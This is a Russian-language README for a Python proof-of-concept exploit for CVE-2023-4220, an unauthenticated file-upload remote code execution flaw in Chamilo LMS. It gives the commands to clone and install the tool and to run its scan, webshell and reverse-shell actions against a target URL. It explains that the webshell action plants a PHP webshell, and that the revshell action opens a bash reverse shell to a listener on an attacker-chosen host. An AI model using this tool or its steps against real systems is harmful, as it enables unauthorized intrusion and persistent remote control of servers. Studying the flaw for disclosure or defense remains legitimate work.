
Это скрипт, написанный на Python, который позволяет эксплуатировать уязвимость безопасности программного обеспечения LMS Chamilo, описанную в CVE-2023-4220
Этот скрипт позволяет эксплуатировать уязвимость безопасности в программном обеспечении Chamilo's LMS, описанную как CVE-2023-4220. Система уязвима в версиях до 1.11.24.
Клонируйте репозиторий на свою машину и установите зависимости с помощью pip (рекомендуется использовать virtualenv для создания окружения, чтобы изолировать эти установки от глобальных).
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt
Скрипту требуется целевой URL с корневым путём Chamilo (например, http://example.com/chamilo, http://example.com или http://chamilo.example.com) и действие для выполнения (доступно три: scan, webshell и revshell).
Это действие проверяет, уязвима ли цель, путём попытки доступа к конечной точке /main/inc/lib/javascript/bigupload/files/.
python3 main.py -u http://example.com/chamilo -a scan

Это действие создаёт файл PHP webshell в уязвимой конечной точке.
python3 main.py -u http://example.com/chamilo -a webshell

Это действие создаёт и выполняет файл bash reverse shell. Для этого сначала будет создан webshell тем же методом, что и в предыдущем действии. После этого будут выполнены некоторые команды для создания и выполнения bash-файла. Убедитесь, что вы слушаете порт, который вы определили с помощью nc или любой другой утилиты, чтобы действительно получить обратное соединение. Также хостом может быть действительный внутренний/публичный IPv4 (например, 172.17.1.4 или 186.227.4.31) или зарегистрированный вами домен (например, evil-vps.domainreg.net).
python3 main.py -u http://example.com/chamilo -a revshell

Примечание: Скоро я добавлю вариант полезной нагрузки для Windows для хостов под управлением Windows.
(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution